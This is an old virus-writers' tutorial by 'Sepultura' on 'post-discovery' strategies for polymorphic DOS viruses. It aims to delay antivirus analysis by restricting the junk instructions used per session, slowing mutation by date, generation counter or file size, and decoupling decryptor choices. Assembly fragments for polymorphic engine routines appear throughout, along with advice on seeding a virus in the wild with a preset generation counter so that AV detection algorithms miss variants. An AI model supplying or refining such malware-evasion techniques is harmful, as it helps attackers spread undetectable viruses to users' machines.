textfiles/virus/polymorph.txt

                     POST - DISCOVERY - STRATAGIES
                     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                              By Sepultura

                   -USE-ANARCHY-TO-GET-WHAT-YOU-WANT-

                              Introduction
                              ~~~~~~~~~~~~

        Most virii these days, take many Pre-Discovery precautions. This
simply means that they take precautions to avoid discovery, assuming the
virus has not already been discovered.  Common examples of Pre-Discovery
Stratagies are  File Stealth,  Sector Stealth,  and MCB stealth (i.e any
stealth).  These mechanisms are used to stop the virus being discovered,
but once it has been discovered,  and is in the hands of the AV, they're
essentially useless. It is only a matter of days (or even hours) until a
suitable scan string or algorithm has been determined,  for inclusion in
to there AV programs.

        There is how ever, a solution: POST DISCOVERY STRATAGIES.  These
are mechanisms  that instead of serving the  purpose of hiding the virus
from detection, make the virus harder to analyse,  and hence determine a
scan string or detection algorithm.  To be entirely honest, the previous
statement is not completely correct - in order to take advantage of  any
of these methods your virus can not have a scan string - without atleast
polymorphism, Post Discovery Stratagies ARE USELESS.  This document will
be divided in to three main sections:   Polymorphism
                                        Anti-Bait Techniques
                                        Anti-Debugger Techniques.

        I have decided to do it in that particular order,  as it follows
my master scheme,  which in my  opinion takes maximum advantage of  Post
Discovery Stratagies, and which I will outline throughout this document.

        I have supplied example code fragments throughout this document,
several full programs in the Anti - Debugger section,  as well as a bait
maker in the Anti-Bait section, so you can test your Anti-Bait routines.


                              Polymorphism
                              ~~~~~~~~~~~~

                   -I-USED-THE-ENEMY-I-USED-ANARCHY-

        This section  is not  intended to  tell you  what a  polymorphic
engine is,  nor  will it tell you  how to code one.  If  you do not know
either of these, you should read this when you do,  or alternatively you
could read this,  and take the explained methods in to account  when you
do code one.

        The thing  you have  to remember  is that  the AV people need to
devise an alogrithm that will detect near to 100% of their samples,  but
at the same time, have only a small number of false positives. Your job,
is ofcourse, to stop them from doing this.


                         Polymorphism: The Obvious
                         ~~~~~~~~~~~~~~~~~~~~~~~~~
        One of the most obvious  things that would you help in your Post
Discovery Stratagies, is to make the decryptors and junk as varied as is
possible. This way, they cannot use an algorithm that traces through the
code, and concludes that the file is not infected, as soon as an  opcode
is encounted that can't be generated by your engine. What might not seem
to obvious, is that although your engine should be able to CREATE a wide
variety of junk instructions,  it should not USE a  wide variety of junk
instructions in each decryptor.  This might seem strange,  but it can be
very useful in delaying the AV's efforts.  This is because there are two
methods that the AV will use to analyse your engine:

       1. They will disassemble the virus and analyse the engine, to see
       what it can generate in all possible cases.

       2. They will infect 10s of thousands of bait files to see what it
       generates in all possible cases.


        The first of these can be countered by keeping the actual engine
encrypted,  independently of the virus,  and then  keeping the decryptor
protected  -  using the  methods outlined in  Section 3 (Anti - Debugger
Techniques).

        The  second  method can be  countered using the  techniques that
will be discussed in this section (Polymorphism), and Section 2  (Anti -
Bait Techniques).

        By  using only a very small variety of the large number of  junk
instructions  that your engine can generate,  when the AV people look at
the sample bait files,  they will only see a small selection of the junk
that your virus can really create. Because your polymorphic engine is so
heavily encrypted / armoured, they will not have time to disassemble it,
and will have to make their judgements based on the bait files. However,
since the decryptors will only have  a limited selection of all possible
cases,  they could easilly make the mistake of basing their algorithm on
just those decryptors,  and release an incomplete algorithm.  Of  course
they will not realise their mistake until it is to late.  Let us look at
the following code as an example:

------------------------------------------------------------------------
;Please note that this is simply a code fragment.  junk? are supposed to
;be sub-procedures that create different junk opcodes, while get_rand is
;supposed  to  be  a sub-procedure  that returns a  random number  in AX
;between 0 and AX. It is assumed that ES = DS = CS.

choose_junk_routines:
        mov     cx,5                    ;This code should be run only once,
        mov     ax,0Ah                  ;when the virus installs it self TSR.
        call    get_rand                ;It will select 5 out of 15 junk
        add     ax,ax                   ;routines to call for the decryptors.
        xchg    si,ax                   ;Because it is only run once, all
        add     si,offset main_junk_tbl ;decryptors will only use those junk
        mov     di,offset junk_tbl      ;routines 'til the system is rebooted
        rep     movsw                   ;and the virus re-installed.

        ...

main_junk_tbl:                          ;This is a table, listing all
        dw      offset junk0            ;possible junk routines.
        dw      offset junk1
        dw      offset junk2
        dw      offset junk3
        dw      offset junk4
        dw      offset junk5
        dw      offset junk6
        dw      offset junk7
        dw      offset junk8
        dw      offset junk9
        dw      offset junkA
        dw      offset junkB
        dw      offset junkC
        dw      offset junkD
        dw      offset junkE

junk_tbl:                               ;This is a table, to store the 5 junk
        dw      0,0,0,0,0               ;routines to actually be used.

        ...

put_junk:
        mov     ax,4                    ;This routine when, called will
        call    get_rand                ;generate 1 junk instruction.
        add     ax,ax                   ;It will call 1 of the 5 routines
        xchg    si,ax                   ;stored in junk_tbl.
        lodsw
        call    ax
        ret
------------------------------------------------------------------------

        The above code fragment,  will ensure that all files infected in
any 1 session, will only use 5 out of the 15 possible junk instructions.


                       Polymorphism: Slow Mutation
                       ~~~~~~~~~~~~~~~~~~~~~~~~~~~
        The above techniques work well,  but can be even more effective,
when used in conjucntion  with slow mutation.  Slow  Mutation  basically
means that instead of making certain descisions based on random numbers,
you  make the  descisions based on  relatively static values.  The  most
common values used for this, are from the date (i.e. the month or day of
the  month).  For  example,  let  us imagine  that  the  sub - procedure
'choose_junk_routines' in the previous example, was replaced with this:

------------------------------------------------------------------------
choose_junk_routines:
        mov     ah,2a                   ;ah=2a/i21 (get system date)
        int     21
        mov     dl,0
        xchg    dh,dl
        xchg    dx,ax
        cwd                             ;ax=month, dx=0
        mov     cx,6
        div     cx                      ;divide month by 6
        xchg    dx,ax                   ;ax = remainder (i.e. 0 - 5)
        add     ax,ax
        xchg    si,ax
        add     si,offset main_junk_tbl
        mov     di,offset junk_tbl
        mov     cx,5
        rep     movsw
------------------------------------------------------------------------

        The advantage of using this method, is that the same set of five
junk routines will be used for a ENTIRE MONTH. With the previous example
if the AV was to make some bait files, and look at them,  and think that
your virus only generated five different junk instructions, and then ran
the bait maker again, another time,  after resetting the system,  he/she
would get bait file with (probably) a different set of junk instructions
in the decryptor. Because of this, he/she would probably catch on.  This
is important to note, because they will have to make a set of bait files
to devise the algorithm,  and then at least  another set to test it.  If
you based the 5 instructions on the month, and armoured the choose_junk_
routines procedure, then they would get the same 5 instructions, because
they would be all produced in the same month, and would not easily catch
on.  Other things you should base upon  slow mutation techniques include
things such as what registers to use,  the looping method,  the encrypt/
decrypt method, and the length of the decryptor. This way,  they have to
reboot the computer each time,  and set a new date,  to see all possible
combinations. Consisdering there are thousands of  bait file to be made,
this also means that there are thousands of resets to be done!

        Another thing you could base slow mutation descisions on,  is  a
generation counter.  This is very effective,  because if the AV runs  an
infected file,  and then because the virus is  TSR  in memory,  runs the
bait creator, to create some infected samples, all the infected samples,
will be of the same generation.  Even if the AV people think of changing
the date, the fact that the virus changes some aspects of itself on each
generation, will not be so obvious. This is especially true if the virus
makes the changes on,  say every fourth generation,  instead of each and
every generation. For example:

------------------------------------------------------------------------

        inc     cs:word ptr generation  ;This should be run once,
                                        ;at installation.

        ...

;This sub-procedure will choose what method to use to decrement the
;count register. It will choose one of the 8 possible procedures to
;call from the "decrement_tbl" table. Instead of choosing a method at
;random, it divdes the generation by 8, and then takes the modulos of
;(GENERATION / 8) / 8, to choose which procedure to use. In short, the
;decrement method will only change every 8th generation. The AV do not
;spend enough time to see all possible methods, as they would have to
;look at 64 different generations. They will most likely look at only
;one or two.

choose_decrement_method:
        mov     ax,0
generation      equ     $-2             ;Generation counter starts at 0

        shr     ax,3                    ;Divide Generation count by 8
        and     ax,7                    ;get number between 0 and 7
        add     ax,ax
        xchg    si,ax
        add     si,offset decrement_tbl
        lodsw
        call    ax
        ret

        ...

decrement_tbl:                          ;this is supposed to be a table of
        dw      offset code_dec_reg     ;all the possible procedures you can
        dw      offset code_sub_reg_1   ;use to decrement the count register.
        dw      offset code_add_reg_negative_1
        dw      offset code_clc_sbb_reg_1
        dw      offset code_stc_sbb_reg_0
        dw      offset code_clc_adc_reg_negative_1
        dw      offset code_stc_adc_reg_negative_2
        dw      offset code_inc_dec_dec_reg
------------------------------------------------------------------------

        Of course,  you do not have to base  something as trivial as the
method of decrement on the  generation counter,  and could  instead base
something more important like the actual method of decryption on it.

        Also,  if you wanted to be really sly  (and I know you do),  you
could use the above method, but then release the virus in the wild, with
its generation counter set to something like 16.  This way,  no one will
see the first 2 methods,  until the generation counter has carried over.
About a week after releasing it, you could release it somewhere else, so
that the AV people will get the first specimen, and their algorithm will
be missing the first two methods, while the second infection you release
can have the counter  set to 0,  so that the decryptors  using the first
two methods will be in the wild,  and will spread, before the AV realise
their mistake.

        Another thing you could base your slow poly on,  is the file you
are infecting.  For example,  let us imagine you based the above example
on the SIZE of the file to be infected, divided by 1000, rather then the
GENERATION divided by 8.  Since the bait files  will be of  the same  or
similar size, little to no change will be seen. If a different file of a
different size was infected however,  you would have a totally different
decryptor!


                Polymorphism: Make No Two Conditions Dependant
                ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
        One of the biggest mistakes you could make when coding an engine
is making two conditions dependant on the same thing. For example let us
imagine that you made both the  index register used,  and the decryption
method used  dependant on the month. This could possibly mean, that when
XOR encryption is used, you can guarantee BX is the index register,  and
when ADD is used SI will be the index register. This way,  all they have
to do is check for a  XOR [SI],?? instruction or a ADD [BX],??.  If  you
made this mistake,  and had four index registers,  and  four  decryption
methods,  the scanner need only to check for four possible instructions.
However,  if these were decided  on totally  independant criteria,  they
would have to check for 16 different instructions, increasing the chance
of false positives. For another example, let us look at the following:
------------------------------------------------------------------------

code_jmp:       mov     ax,3f           ;this code will generate a random
                call    get_rand        ;conditional jump, to a random offset
                mov     ah,al           ;between 0 adn 3f bytes from the
                or      al,70           ;jump. Note that the conditional
                stosw                   ;jumps are 70h -> 7fh.
------------------------------------------------------------------------

        The above example will always generate,  a working,  conditional
jump. It does however have a fairly obvious flaw.  If the jump opcode is
70h then the offset of the jump will be 0, 10h, 20h, or 30h. If the jump
opcode is 70h then the offset of the jump will be 1, 11h,  21h,  or 31h.
This will remain true for all of 70h to 7fh. This is very dangerous,  as
a scanner could something like this in its algorithm:
------------------------------------------------------------------------

;This code fragment, is assumed to be part of a scanner that is tracing
;through the code it scans. It is assumed that DS:SI points to the current
;instruction being processed.

                lodsw
                cmp     al,70
                jb      not_cond_jmp
                cmp     al,7f           ;checks if we are dealing with a
                ja      not_cond_jmp    ;conditional jump.

                and     ax,0f0f         ;If the jump was generated with the
                cmp     al,ah           ;above example, AL will always = AH.
                jne     file_not_infected

not_cond_jmp:   <DO THE NEXT CHECK>
------------------------------------------------------------------------

        As you can see,  if many things are dependant on each other,  an
algorithm could be used that uses techniques like the above,  and if all
rules are followed, safely assume the file was infected.  To  avoid  the
above check, the conditional jump coder should be something like this:
------------------------------------------------------------------------

                mov     ax,3f
                call    get_rand
                mov     bl,al
                mov     al,0f
                call    get_rand
                or      al,70
                mov     ah,bl
                stosw
------------------------------------------------------------------------

        As you can see, in the above example, the  offset of the jump is
totally independant of the jumps opcode.  This will  make the  detection
algorithm alot harder to devise.